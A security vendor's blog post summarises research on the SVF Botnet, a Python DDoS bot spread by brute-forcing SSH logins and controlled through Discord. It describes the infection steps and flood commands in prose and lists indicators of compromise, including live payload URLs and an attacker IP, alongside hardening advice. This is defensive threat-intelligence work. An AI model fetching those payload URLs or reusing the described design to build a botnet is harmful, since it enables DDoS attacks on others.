AhnLab Security Intelligence Center (ASEC) has recently uncovered a wave of malicious activity involving the SVF Botnet, a lightweight yet capable Python-based malware used to launch DDoS attacks via compromised Linux SSH servers. The campaign highlights the continuing abuse of weak or default SSH credentials on internet-facing infrastructure.
Infection Tactics: Fast and Scripted
ASEC researchers observed attackers infiltrating Linux honeypots by brute-forcing SSH credentials. Once access is gained, the infection chain is executed in a single shell command:
- Create a Python virtual environment
- Install required packages: discord.py, requests, aiohttp, lxml
- Download the malicious payload from a public URL
- Execute it with parameters to register the infected server in a designated group
The malware then authenticates using a hardcoded Discord bot token and reports in via webhook, effectively using Discord as its command-and-control (C2) infrastructure.
SVF Bot Capabilities
SVF Bot supports multiple DDoS vectors, including:
- Layer 7 (HTTP Flood)
- Layer 4 (UDP Flood)
Operators can control attack intensity through configurable parameters like concurrency, thread count, and packet size. Notably, the bot integrates a proxy scraping and validation module to bolster attack anonymity:
- Scrapes proxy lists from GitHub and other public sources
- Validates proxies using real-time Google login attempts
- Uses validated proxies to route HTTP floods
Commands like $load, $customhttp, and $customudp allow for highly targeted attacks. The malware’s modular design also supports remote updates, forced restarts, and recovery from crashes—making it both persistent and flexible.
Discord as a C2 Platform
By using Discord as its C2 hub, SVF Bot operators avoid the overhead of maintaining dedicated infrastructure. Discord’s widespread adoption and real-time communication features allow attackers to issue instructions, receive infection reports, and coordinate campaigns with ease.
This also complicates traditional detection and takedown efforts, as the botnet traffic blends in with legitimate communications on a mainstream platform.
Indicators of Compromise (IOCs)
Security teams should monitor for the following IOCs associated with SVF Bot activity:
- MD5 Hash: cffe3fb6cb3e4b9b453c4147bdcd8c12
- Download URL: http://146.59.239.144:55/
- Payload URL: https://termbin.com/4ccx
- Attacker IP: 185.254.75.44
Implications for Defenders
ASEC’s findings are a strong reminder that Linux servers remain a prime target for botnet operators, especially when basic hardening practices are ignored. The use of Python, open-source libraries, and Discord lowers the barrier for running large-scale attacks—even for less sophisticated threat actors.
FastNetMon’s Recommendations
1. Strengthen SSH Security
- Disable password-based login and use SSH keys
- Enforce strong, unique credentials
- Limit access via firewall to known IPs
2. Keep Systems Patched
- Update Python, SSH services, and OS packages regularly
- Apply endpoint protection with active malware scanning
3. Monitor for Anomalous Network Behavior
- Watch for outbound traffic to known IOCs
- Use behavior-based detection systems to flag unusual proxy usage or Discord-based C2 traffic
4. Deploy Network-Level DDoS Mitigation
- Use systems like FastNetMon Advanced to detect traffic spikes, floods, and botnet behaviour in real-time
- Implement automated blocking and rate-limiting for attack traffic
Conclusion
This incident demonstrates how attackers are adapting to modern ecosystems—using familiar tools like Discord, scripting languages like Python, and freely available proxies to build resilient and scalable botnet infrastructures. Thanks to the detailed analysis by AhnLab Security Intelligence Center, defenders have a clearer picture of the threat and the steps required to mitigate it.
About FastNetMon
FastNetMon is a leading solution for network security, offering advanced DDoS detection and mitigation. With real-time analytics and rapid response capabilities, FastNetMon helps organisations protect their infrastructure from evolving cyber threats.
For more information, visit https://fastnetmon.com